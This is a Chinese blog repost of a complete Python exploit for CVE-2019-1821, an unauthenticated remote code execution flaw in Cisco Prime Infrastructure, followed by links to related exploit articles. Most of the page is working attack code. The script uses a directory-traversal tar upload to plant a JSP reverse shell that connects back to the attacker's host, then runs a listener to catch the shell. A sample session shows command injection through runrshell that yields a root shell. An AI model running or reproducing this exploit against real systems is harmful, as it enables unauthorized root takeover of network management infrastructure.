CVE-2019-1821 Cisco Prime Infrastructure Remote Code Execution
https://srcincite.io/blog/2019/05/17/panic-at-the-cisco-unauthenticated-rce-in-prime-infrastructure.html

Cscan思科扫描插件 (IP/Port/HostName/Boot/Version)
https://www.cnblogs.com/k8gege/p/10679491.html

CVE-2019-1821 Exploit

#!/usr/bin/python

"""

Cisco Prime Infrastructure Health Monitor HA TarArchive Directory Traversal Remote Code Execution Vulnerability

Steven Seeley (mr_me) of Source Incite - 2019

SRC: SRC-2019-0034

CVE: CVE-2019-1821

Example:

========

saturn:~ mr_me$ ./poc.py

(+) usage: ./poc.py <target> <connectback:port>

(+) eg: ./poc.py 192.168.100.123 192.168.100.2:4444

saturn:~ mr_me$ ./poc.py 192.168.100.123 192.168.100.2:4444

(+) planted backdoor!

(+) starting handler on port 4444

(+) connection from 192.168.100.123

(+) pop thy shell!

python -c 'import pty; pty.spawn("/bin/bash")'

[prime@piconsole CSCOlumos]$ /opt/CSCOlumos/bin/runrshell '" && /bin/sh #'

/opt/CSCOlumos/bin/runrshell '" && /bin/sh #'

sh-4.1# /usr/bin/id

/usr/bin/id

uid=0(root) gid=0(root) groups=0(root),110(gadmin),201(xmpdba) context=system_u:system_r:unconfined_java_t:s0

sh-4.1# exit

exit

exit

[prime@piconsole CSCOlumos]$ exit

exit

exit

"""

import sys

import socket

import requests

import tarfile

import telnetlib

from threading import Thread

from cStringIO import StringIO

from requests.packages.urllib3.exceptions import InsecureRequestWarning

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

def _build_tar(ls, lp):

    """

    build the tar archive without touching disk

    """

    f = StringIO()

    b = _get_jsp(ls, lp)

    t = tarfile.TarInfo("../../opt/CSCOlumos/tomcat/webapps/ROOT/si.jsp")

    t.size = len(b)

    with tarfile.open(fileobj=f, mode="w") as tar:

        tar.addfile(t, StringIO(b))

    return f.getvalue()

def _get_jsp(ls, lp):

    jsp = """<%@page import="java.lang.*"%>

<%@page import="java.util.*"%>

<%@page import="java.io.*"%>

<%@page import="java.net.*"%>

<%

  class StreamConnector extends Thread

  {

    InputStream sv;

    OutputStream tp;

    StreamConnector( InputStream sv, OutputStream tp )

    {

      this.sv = sv;

      this.tp = tp;

    }

    public void run()

    {

      BufferedReader za  = null;

      BufferedWriter hjr = null;

      try

      {

        za  = new BufferedReader( new InputStreamReader( this.sv ) );

        hjr = new BufferedWriter( new OutputStreamWriter( this.tp ) );

        char buffer[] = new char[8192];

        int length;

        while( ( length = za.read( buffer, 0, buffer.length ) ) > 0 )

        {

          hjr.write( buffer, 0, length );

          hjr.flush();

        }

      } catch( Exception e ){}

      try

      {

        if( za != null )

          za.close();

        if( hjr != null )

          hjr.close();

      } catch( Exception e ){}

    }

  }

  try

  {

    String ShellPath = new String("/bin/sh");

    Socket socket = new Socket("__IP__", __PORT__);

    Process process = Runtime.getRuntime().exec( ShellPath );

    ( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();

    ( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();

  } catch( Exception e ) {}

%>"""

    return jsp.replace("__IP__", ls).replace("__PORT__", str(lp))

def handler(lp):

    """

    This is the client handler, to catch the connectback

    """

    print "(+) starting handler on port %d" % lp

    t = telnetlib.Telnet()

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    s.bind(("0.0.0.0", lp))

    s.listen(1)

    conn, addr = s.accept()

    print  "(+) connection from %s" % addr[0]

    t.sock = conn

    print "(+) pop thy shell!"

    t.interact()

def exec_code(t, lp):

    """

    This function threads the client handler and sends off the attacking payload

    """

    handlerthr = Thread(target=handler, args=(lp,))

    handlerthr.start()

    r = requests.get("https://%s/si.jsp" % t, verify=False)

def we_can_upload(t, ls, lp):

    """

    This is where we take advantage of the vulnerability

    """

    td = _build_tar(ls, lp)

    bd = {'files': ('si.tar', td)}

    h = {

      'Destination-Dir': 'tftpRoot',

      'Compressed-Archive': "false",

      'Primary-IP' : '127.0.0.1',

      'Filecount' : "1",

      'Filename': "si.tar",

      'Filesize' : str(len(td)),

    }

    r = requests.post("https://%s:8082/servlet/UploadServlet" % t, headers=h, files=bd, verify=False)

    if r.status_code == 200:

        return True

    return False

def main():

    if len(sys.argv) != 3:

        print "(+) usage: %s <target> <connectback:port>" % sys.argv[0]

        print "(+) eg: %s 192.168.100.123 192.168.100.2:4444" % sys.argv[0]

        sys.exit(-1)

    t  = sys.argv[1]

    cb = sys.argv[2]

    if not ":" in cb:

        print "(+) using default connectback port 4444"

        ls = cb

        lp = 4444

    else:

        if not cb.split(":")[1].isdigit():

            print "(-) %s is not a port number!" % cb.split(":")[1]

            sys.exit(-1)

        ls = cb.split(":")[0]

        lp = int(cb.split(":")[1])

    if we_can_upload(t, ls, lp):

        print "(+) planted backdoor!"

        exec_code(t, lp)

if __name__ == '__main__':

    main()

收藏的一些Exphttps://github.com/k8gege/CiscoExploit

[EXP]CVE-2019-1821 Cisco Prime Infrastructure思科未授权远程代码执行漏洞的更多相关文章

  1. PHP-FPM 远程代码执行漏洞(CVE-2019-11043)复现-含EXP

    搭建容器 安装golang 利用程序 https://github.com/neex/phuip-fpizdam 安装git Cobra包安装 go get -v github.com/spf13/c ...

  2. windows 快捷方式(.lnk)代码执行漏洞(CVE-2017-8464 )[附EXP生成工具]

    最近看到网上曝光了一个windows远程代码执行的漏洞,黑客可以通过一个快捷方式在用户电脑上执行任意指令,于是便对该漏洞进行了部分分析. 1. 漏洞描述: MicrosoftWindows .LNK  ...

  3. FlexPaper 2.3.6 远程命令执行漏洞 附Exp

    影响版本:小于FlexPaper 2.3.6的所有版本 FlexPaper (https://www.flowpaper.com) 是一个开源项目,遵循GPL协议,在互联网上非常流行.它为web客户端 ...

  4. Cisco Smart Install远程命令执行漏洞

    0x01前言 在Smart Install Client代码中发现了基于堆栈的缓冲区溢出漏洞,该漏洞攻击者无需身份验证登录即可远程执行任意代码.cisco Smart Install是一种“即插即用” ...

  5. Joomla![1.5-3.4.5]反序列化远程代码执行EXP(直接写shell)

    Usage:x.py http://xxx.com # coding=utf-8# author:KuuKi# Help: joomla 1.5-3.4.5 unserialize remote co ...

  6. “全栈2019”Java异常第二十一章:finally不被执行的情况

    难度 初级 学习时间 10分钟 适合人群 零基础 开发语言 Java 开发环境 JDK v11 IntelliJ IDEA v2018.3 文章原文链接 "全栈2019"Java异 ...

  7. “全栈2019”Java异常第五章:一定会被执行的finally代码块

    难度 初级 学习时间 10分钟 适合人群 零基础 开发语言 Java 开发环境 JDK v11 IntelliJ IDEA v2018.3 文章原文链接 "全栈2019"Java异 ...

  8. “全栈2019”Java第四十二章:静态代码块与初始化顺序

    难度 初级 学习时间 10分钟 适合人群 零基础 开发语言 Java 开发环境 JDK v11 IntelliJ IDEA v2018.3 文章原文链接 "全栈2019"Java第 ...

  9. RHSA-2017:2029-中危: openssh 安全和BUG修复更新(存在EXP、代码执行、本地提权)

    [root@localhost ~]# cat /etc/redhat-release CentOS Linux release 7.2.1511 (Core) 修复命令: 使用root账号登陆She ...

随机推荐

  1. PIE 插件式开发小笔记__PIESDK学习体会

    基于PIE.NET-SDK插件式二次开发文档笔记:  PIE 插件式开发配置文件: 它里面一行如下:      理解上一行'Item'关系->    library:为插件类名(程序集名称+后缀 ...

  2. PIE SDK影像快速拼接

    1.算法功能简介 快速拼接是对若干幅互为邻接的遥感数字图像拼在一起,构成一幅整体影像的技术过程.PIE支持快速拼接算法功能的执行,下面对快速拼接算法功能进行介绍. 2.算法功能实现说明 2.1 实现步 ...

  3. Java自学-I/O 关闭流的方式

    关闭流的方式 所有的流,无论是输入流还是输出流,使用完毕之后,都应该关闭. 如果不关闭,会产生对资源占用的浪费. 当量比较大的时候,会影响到业务的正常开展. 步骤 1 : 在try中关闭 在try的作 ...

  4. web的应用模式

    在开发web应用中,有两种模式: 1.前后端分离. 2.前后端不分离. 一.前后端不分离 在前后端不分离的应用模式中,前端页面看到的效果是有后端控制的,由后端渲染页面或重定向,也就是后端需要控制前端的 ...

  5. 小程序自定义tabbar custom-tab-bar 6s出不来解决方案,cover-view不兼容

    1.从微信小程序的官网扣下来的demo,实际测试中,发现6s ios10 系统不兼容,里面的内容出不来 <cover-view class="tab-bar"> < ...

  6. H5离线缓存(基础)学习指南

    离线缓存 application cache 1. 什么是离线缓存: 离线缓存可以将站点的一些文件缓存到本地,它是浏览器自己的一种机制,将需要的文件缓存下来,以便后期即使没有连接网络,被缓存的页面也可 ...

  7. React Navigation 导航栏样式调整+底部角标消息提示

    五一佳节匆匆而过,有人选择在外面看人山人海,有人选择宅在家中度过五一,也有人依然坚守在第一线,致敬! 这是坚持学习react-native的第二篇文章,可能会迟到,但是绝不会缺席,这篇要涉及到的是re ...

  8. kernel: nfsd: too many open TCP sockets, consider increasing the number of threads

    在/var/log/syslog中看到如下报错:   kernel: nfsd: too many open TCP sockets, consider increasing the number o ...

  9. Makefile 基础语法

    1.. specify the directores , i not specified , search current directory put every folder into a list ...

  10. python参数传递

    1.形式参数:在定义函数时,函数名后面括号中的参数为“形式参数”,也称形参 2.实际参数:在调用一个函数时,函数名后面括号种的参数为“实际参数”,也就是将函数的调用者提供给函数的参数称为实际参数,也称 ...